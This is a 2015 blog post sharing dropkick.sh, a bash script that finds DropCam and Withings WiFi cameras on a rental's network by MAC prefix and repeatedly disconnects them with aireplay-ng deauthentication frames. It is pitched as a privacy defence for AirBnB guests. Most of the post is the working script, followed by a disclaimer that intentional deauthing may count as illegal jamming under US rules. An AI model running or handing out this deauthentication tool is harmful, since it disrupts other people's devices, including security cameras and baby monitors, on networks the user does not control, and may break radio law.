Published: Fri 18 December 2015

Context

There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.

Thanks to Adam Harvey for giving me the push, not to mention for naming it.

For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.

dropkick.sh

See code comments for more info. You’re welcome.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 #!/bin/bash # # DROPKICK.SH # # Detect and Disconnect the DropCam and Withings devices some people are using to # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: # # http://julianoliver.com/output/log_2014-05-30_20-52 # # This script was named by Adam Harvey (http://ahprojects.com), who also # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio # notification. Comment it out if you don't need it. # # See also http://plugunplug.net, for a plug-and-play device that does this # based on OpenWrt. Code here: # # https://github.com/JulianOliver/CyborgUnplug # # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows: # # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell. readonly NIC = $1 # Your wireless NIC readonly BSSID = $2 # Network BSSID (AirBnB WiFi network) readonly MAC = $( /sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }' ) # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not # present. readonly GGMAC = '@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings readonly POLL = 30 # Check every 30 seconds readonly LOG = /var/log/dropkick.log airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device while true ; do for TARGET in $( arp-scan -I $NIC --localnet | grep -o -E \ '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' ) do if [[ " $TARGET " == " $GGMAC " ]] then # Audio alert beep -f 1000 -l 500 -n 200 -r 2 echo "WiFi camera discovered: " $TARGET >> $LOG aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 echo "De-authed: " $TARGET " from network: " $BSSID >> $LOG echo ' __ __ _ __ __ ___/ /______ ___ / /__ (_)___/ /_____ ___/ / / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ /_/ ' else echo $TARGET ": is not a DropCam or Withings device. Leaving alone.." fi done echo "None found this round." sleep $POLL done airmon-ng stop mon0

Disclaimer

For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers - while illegal - are cheap. If you care, use cable.

It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal - still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.

All said, use of this script is at your own risk. Use with caution.